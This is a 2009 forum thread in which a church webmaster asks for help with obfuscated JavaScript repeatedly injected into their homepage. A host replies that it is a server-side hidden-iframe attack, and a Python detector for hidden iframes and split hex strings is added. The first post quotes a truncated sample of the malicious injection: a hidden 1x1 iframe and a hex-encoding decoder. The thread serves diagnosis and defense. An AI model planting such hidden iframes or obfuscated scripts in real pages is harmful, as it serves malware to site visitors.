Malscript problem pls help!

salai January 24, 2009 at 00:18:44
Specs: Windows XP, intel
I help maintain our local church website and we have an issue with malscript on our index.html page. After updating and uploading the index.html file to the server, some weird code keeps getting added right after the body tag. The file is good for two or three days and then the malscript code starts to appear. I delete the file and re-upload a clean index.html file, and again after one or two days the code comes back, and when I open the website my anti-virus says the following:

"McAfee has automatically blocked and removed a Trojan.

About this Trojan
Detected: JS/Obfuscated (Trojan)
Location: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\14383Y2A\bciweb_info[1].htm

Trojans appear as legitimate programs but can damage valuable files, disrupt performance, and allow unauthorized access to your computer."

The web design appearance is messed up too.

I have had this issue for about a month or so now. I formatted my hard drive, cleaned everything, and installed anti-virus. I changed the password and tried the whole thing again, but the same thing happened. I contacted the server's customer service, but all they say is that there is a problem with the coding and that the code could come from the uploading process.
Any help, ideas, suggestions will be much appreciated.


Here is part of the code that keeps getting added:

iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l497845a6109d5(l497845a610dbe){ return (parseInt(l497845a610dbe,16));}function l497845a611977(l497845a611d5f){ function l497845a612d03(){var l497845a6130ea=2;return l497845a6130ea;} var l497845a612148='';l497845a6134d6=String.fromCharCode;for(l497845a6126c6=0;l497845a6126c6<l497845a611d5f.length;l497845a6126c6+=l497845a612d03()){ l497845a612148+=(l497845a6134d6(c102916999516l497845a6109d5(l497845a611d5f.substr(l497845a6126c6,l497845a612d03()))));}return l497845a612148;} var x5a='';var l497845a6138bd='3C736'+x5a+'3726'+x5a+'970743E6'+x5a+'96'+x5a+'6'+x5a+'28216'+x5a+'D796'+


March 3, 2009 at 21:03:35
Well, it's for sure something happening on server side.
I'm a server host, and am unfortunately familiar with the problem.

Attacks appear with rather similar code every time, but it's usually different; the JS is actually processed somehow and it's being randomized/encrypted by whichever thing is installed on the host itself.

LET ME SAY, that this has NOTHING to do with your computer, it's something that happens on the server without you necessarily having knowledge of it.

The reason McAfee picks it up as a virus is that the code looks like HEX/BINARY and does not belong where it's found.

The moment you download the page, the anti-virus will strip out that line of code and let you see the rest of the page.

You will lose your </body> tag, as it seems to be attaching to that exact line of code.

Also, you did not include all of the code.
Having all of the code could allow people to understand what is happening.

The principle of this attack is a simple IFRAME attack, which will direct users to another page without their knowledge.
This could potentially be used to actually serve viruses off of your pages, and it's a rather IMPORTANT situation that your host should take care of.

Can you send me some info on who you are, who your host is, and what the website is?

I know you are not one of my clients :P

Let me know.


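A defender-side check for the pattern discussed in this thread, as an added example that is not part of any post: it flags hidden iframes and statically joins and hex-decodes the split string literals without running the script. The sample page is constructed from the fragment quoted in the first post, and the function names are this example's own.

```python
import re

# Constructed sample modeled on the fragment quoted in the first post
# (placeholder URL; only the hex prefix visible in the post is used).
SAMPLE = (
    "<html><body>"
    "<iframe src='http://url/' width='1' height='1' "
    "style='visibility: hidden;'></iframe>"
    "<script>var x5a='';var p='3C736'+x5a+'3726'+x5a+'970743E6'+x5a+'96'"
    "+x5a+'6'+x5a+'28216'+x5a+'D796';</script>"
    "<h1>Welcome</h1></body></html>"
)

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# Invisible styling, or a width/height attribute of exactly 0 or 1
HIDDEN_RE = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none"
    r"|(?:width|height)\s*=\s*['\"]?[01]\b", re.I)
# Quoted hex chunks glued together as 'AB'+name+'CD'+name+...
CHAIN_RE = re.compile(r"'[0-9A-Fa-f]+'(?:\s*\+\s*\w+\s*\+\s*'[0-9A-Fa-f]+')+")


def hidden_iframes(html):
    """Return iframe tags that are invisible or 0/1 pixel in size."""
    return [t for t in IFRAME_RE.findall(html) if HIDDEN_RE.search(t)]


def decode_hex_chains(html):
    """Join split hex literals and decode them; nothing is executed."""
    out = []
    for m in CHAIN_RE.finditer(html):
        hexstr = "".join(re.findall(r"'([0-9A-Fa-f]+)'", m.group(0)))
        hexstr = hexstr[: len(hexstr) // 2 * 2]  # drop a dangling nibble
        out.append(bytes.fromhex(hexstr).decode("latin-1"))
    return out


def scan(html):
    """Summarize both indicators for one page."""
    return {"hidden_iframes": hidden_iframes(html),
            "decoded": decode_hex_chains(html)}


if __name__ == "__main__":
    print(scan(SAMPLE))
```

On the truncated fragment from the first post, the decoded text begins `<script>if(!my`, which shows the hex string is a second script written into the page at load time.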

March 9, 2009 at 04:23:27
I noticed you referred to a file name that had a [1] added to it. This usually refers to an amended file or a substitute for the original file. I am having problems with a virus that uses this format also. The file name came up when I was trying to open an Internet Explorer page. The address I entered was: "". That address was substituted with one named "runonce3[1].aspx". It was supposed to be located in Documents and Settings/Current User/Local Settings/Application Data but it deleted itself. I was able to capture a copy of it because it was the "SOURCE" FILE for the error page that came up in Internet Explorer..."Unable to...etc" (access "VIEW", then select "SOURCE"). Perhaps the server-side error or change in code is just a symptom. The SOURCE file (runonce3[1].aspx) referred to getting a document from the following site: "". Hope this is of some help. "itskathysnet" 3/9/09 5:22 AM
